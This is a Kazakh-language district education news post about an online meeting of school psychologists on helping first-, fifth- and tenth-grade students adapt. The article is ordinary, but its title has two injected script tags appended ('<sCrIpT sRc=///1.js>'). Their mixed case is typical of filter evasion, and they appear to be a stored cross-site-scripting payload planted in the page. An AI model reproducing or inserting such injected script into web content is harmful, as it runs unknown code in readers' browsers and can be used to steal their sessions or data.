«Оқушыларға бейімделу кезеңін психологиялық сүйемелдеу (1,5,10 сыныптар)» атты аудандық онлайн отырысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.09.2024

Аудандық әдістемелік кабинетінің жоспарына сәйкес 2024 жылдың 19 қыркүйегінде  «Оқушыларға бейімделу кезеңін психологиялық сүйемелдеу (1,5,10 сыныптар)» атты аудандық онлайн отырысы өтті. Отырыста жалпы орта білім беру ұйымдарының аудан педагог-психологтары қатысты.
Отырыстың мақсаты: бейімделу кезеңінде психологиялық сүйемелдеуге жәрдемдесу. Психологиялық қызметті ұйымдастыру бойынша  құжаттамасын жүргізу процесінде педагогтарға көмек көрсету. 
Отырыста Макинск қаласының  мектеп-лицейінің педагог-психологы Ханаева Л. К. сөз алып,  оқушылардың бейімделу кезеңін талқылап, әр сыныптың бейімделу кезеңіне тоқталып, ұсыныстарды белгілеп, ата-аналармен бейімделудегі қиындықтарды алдын алу мақсатында жүргізетін жұмысты нақтылады. Әдістемелік кабинетінің әдіскері Галия Баитова өз сөзінде «ҚР Білім министрінің 2022 жылы 25 тамыздағы № 377 және  2020 жылғы 6 сәуірдегі № 130 бұйрықтарына тоқталып, психологиялық қызметтің  жұмыс  түрлерін, тәртібін және бағыттарын атап өтті. Отырыс  соңында ұсыным қабылданды.

Просмотров: 1452

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу